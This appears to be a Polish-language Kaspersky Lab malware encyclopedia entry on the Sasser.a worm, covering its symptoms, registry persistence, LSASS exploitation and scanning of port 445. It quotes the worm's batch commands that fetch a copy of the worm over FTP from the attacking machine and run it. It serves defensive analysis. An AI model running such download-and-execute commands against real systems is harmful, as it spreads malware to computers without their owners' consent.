Polski
Kalendarz Kanały RSS Kontakt Ankiety
Szukaj
Stan zagrożeń w internecie znajduje się obecnie na poziomie standardowym. Nie występują duże epidemie a eksperci z Kaspersky Lab nie zanotowali żadnych poważnych incydentów związanych z bezpieczeństwem. Poziom zagrożenia: 1

Home Encyklopedia Robaki Net-Worm.Win32.Sasser.a

Net-Worm.Win32.Sasser.a

Jest to robak rozprzestrzeniający się przez internet przy użyciu luki w zabezpieczeniach usługi LSASS systemów Windows. Luka ta została opisana w biuletynie MS04-011 firmy Microsoft. Szkodnik ma rozmiar około 15 KB (kompresja PECompact2) i powstał przy użyciu języka programowania C/C++. Robak atakuje systemy operacyjne Windows 2000, Windows XP oraz Windows Server 2003.

Oznaki infekcji

O zainfekowaniu komputera robakiem Sasser.a mogą świadczyć następujące symptomy:

  • obecność pliku avserve.exe w folderze Windows,
  • pojawianie się komunikatu o wystąpieniu błędu w usłudze LSASS oraz restartowanie się komputera.

Rozprzestrzenianie

Po uruchomieniu robak tworzy w folderze Windows plik avserve.exe oraz klucz auto-run w rejestrze systemowym:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"avserve.exe" = "%Folder Windows%\avserve.exe"

W celu oznaczenia zainfekowanych komputerów Sasser.a tworzy w pamięci RAM unikatowy identyfikator Jobaka31.

Szkodnik uruchamia serwer FTP na porcie TCP 5554, po czym aktywuje 128 procedur rozprzestrzeniających. W tym samym czasie robak podejmuje próbę zainicjowania procesu AbortSystemShutdown, który powoduje ponowne uruchomienie komputera.

W celu zidentyfikowania potencjalnych ofiar Sasser.a skanuje adresy IP i wysyła żądania na port TCP 445. Jeżeli zdalny komputer zezwoli na połączenie, robak instaluje tam (korzystając z luki w zabezpieczeniach LSASS) interpreter poleceń cmd.exe na porcie TCP 9996. Na koniec robak przesyła polecenia, które pobierają go i uruchamiają na atakowanej maszynie. Kopia szkodnika pobierana jest z nazwą N_up.exe, gdzie "N" jest losowym numerem. Oto komendy wysyłane przez Sassera: 

echo off
echo open [adres atakowanego komputera] 5554>>cmd.ftp
echo anonymous>>cmd.ftp
echo user
echo bin>>cmd.ftp
echo get [losowy numer]_up.exe>>cmd.ftp
echo bye>>cmd.ftp
echo on
ftp -s:cmd.ftp
[losowy numer]_up.exe
echo off
del cmd.ftp
echo on

W rezultacie na atakowanym komputerze pojawiają się kopie Sassera posiadające (przykładowo) nazwy 23101_up.exe, 5409_up.exe itd.

Informacje dodatkowe

Po zakończeniu ataku zainfekowany komputer generuje komunikat o wystąpieniu błędu w usłudze LSASS, po czym może nastąpić restart komputera.

Sasser.a tworzy w folderze głównym dysku C plik win.log i zapisuje w nim adresy IP wszystkich zainfekowanych komputerów.


Drukuj
Udostępnij

Analizy

Spam i phishing w 2018 r.

Cyberzagrożenia finansowe w 2018 r.

Ewolucja mobilnego szkodliwego oprogramowania w 2018 r.

Zagrożenia dla użytkowników stron dla dorosłych w 2018 roku

Ataki DDoS w IV kwartale 2018 r.

Blog

Zdalnie kontrolowane domowe ładowarki pojazdów elektrycznych – zagrożenia i luki w zabezpieczeniach

Czy wiesz, ile jesteś wart?

Badanie dot. aplikacji umożliwiających korzystanie ze wspólnych samochodów (car sharing)

Żadnej taryfy ulgowej dla szkodnika ExPetr

ExPetr/Petya/NotPetya jest programem Wiper, nie Ransomware



Kaspersky Anti-virus Logo

©Kaspersky Lab
Kaspersky Lab Polska Sp. z o.o.

kaspersky.pl

Produkty i Usługi

Sklep

Zagrożenia

Do pobrania

Pomoc techniczna

Partnerzy

O firmie

securelist.pl

Analizy

Statystyki

Encyklopedia

Słownik